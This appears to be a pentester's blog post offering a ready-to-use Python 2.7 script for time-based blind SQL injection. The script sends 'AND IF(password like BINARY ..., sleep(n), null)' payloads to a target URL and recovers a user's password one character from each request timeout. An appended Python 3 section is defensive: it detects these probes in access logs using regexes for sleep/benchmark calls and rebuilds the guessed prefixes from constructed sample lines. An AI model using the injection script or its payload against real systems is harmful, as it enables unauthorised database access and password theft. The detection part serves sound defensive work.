
Very Simple Blind SQL Injection Python 2.7.x Script Template for Penetration Testers


Do not forget to change the parameters to your own…

```python
# Very simple blind SQL injection script template for Python 2.7.x
import requests

# Sample character set
characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# Sample target
target = 'CHANGE_ME_FIRST ex:www.abc.com'

# Sample parameters (replace every placeholder before running)
username = 'CHANGE_ME_FIRST ex:admin'
password_length = 'CHANGE_ME_FIRST ex:12'   # number of characters to recover
sqlSleepTime = 'CHANGE_ME_FIRST ex:5'       # seconds the database sleeps on a match
requestTimeOut = 'CHANGE_ME_FIRST ex:1'     # client timeout; must be shorter than sqlSleepTime

# Check that the target answers before starting
r = requests.get(target)
if r.status_code != requests.codes.ok:
    raise ValueError('Sorry! We cannot connect the site...')
else:
    print 'Connection OK! We can go now...'

# Recover the password one character at a time: a request that times out
# means the guessed prefix matched and the database slept.
def letBlind():
    foundChars = ''
    for i in range(int(password_length)):
        for c in characters:
            try:
                blindSql = '?username='+username+'" AND IF(password like BINARY "'+foundChars+c+'%",sleep('+str(sqlSleepTime)+'),null)"'
                r = requests.get(target+blindSql, timeout=float(requestTimeOut))
            except requests.exceptions.Timeout:
                foundChars += c
                print 'Found chars in password: ' + foundChars
                break

# Start show...
letBlind()
```
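Seen from the defending side, the requests this template generates leave a recognisable trail in web server access logs. The following is an added example (Python 3, not part of the original post): it flags clients that repeatedly send a MySQL delay primitive inside one query parameter and recovers the prefixes they guessed. The log lines, addresses, the `/login` path and the names `scan`, `sample_probe` and `SAMPLE_LOG` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# MySQL delay primitives that a time-based blind probe depends on.
DELAY = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.I)
# Prefix guess of the form LIKE [BINARY] "<prefix>%", as in the template's payload.
PREFIX = re.compile(r'like\s+(?:binary\s+)?["\']([^"\'%]*)%', re.I)
# Combined log format: capture the client address and the request target.
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def scan(lines, min_probes=3):
    """Map (client, parameter) -> guessed prefixes, for clients at or above min_probes."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes, so encoded quotes and spaces are normalised.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if DELAY.search(value):
                guess = PREFIX.search(value)
                hits[(client, name)].append(guess.group(1) if guess else None)
    return {k: v for k, v in hits.items() if len(v) >= min_probes}

def sample_probe(prefix):
    # Constructed log line carrying the template's payload for one prefix guess.
    q = 'admin%22%20AND%20IF(password%20like%20BINARY%20%22' + prefix + '%25%22,sleep(5),null)%22'
    return '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /login?username=%s HTTP/1.1" 200 512' % q

# Constructed sample: four probes from one client plus two benign requests.
SAMPLE_LOG = [sample_probe(p) for p in ('0', '1', 's', 's0')] + [
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?username=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=sleep+tracker HTTP/1.1" 200 734',
]

if __name__ == '__main__':
    for (client, param), prefixes in scan(SAMPLE_LOG).items():
        print(client, param, prefixes)
```

Access logs only show the query string, so the same check has to run in the application or a WAF to cover parameters sent in request bodies.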


ABOUT THE AUTHOR

Application Security, Information and Software Security Specialist, Ethical Hacker and Pentester
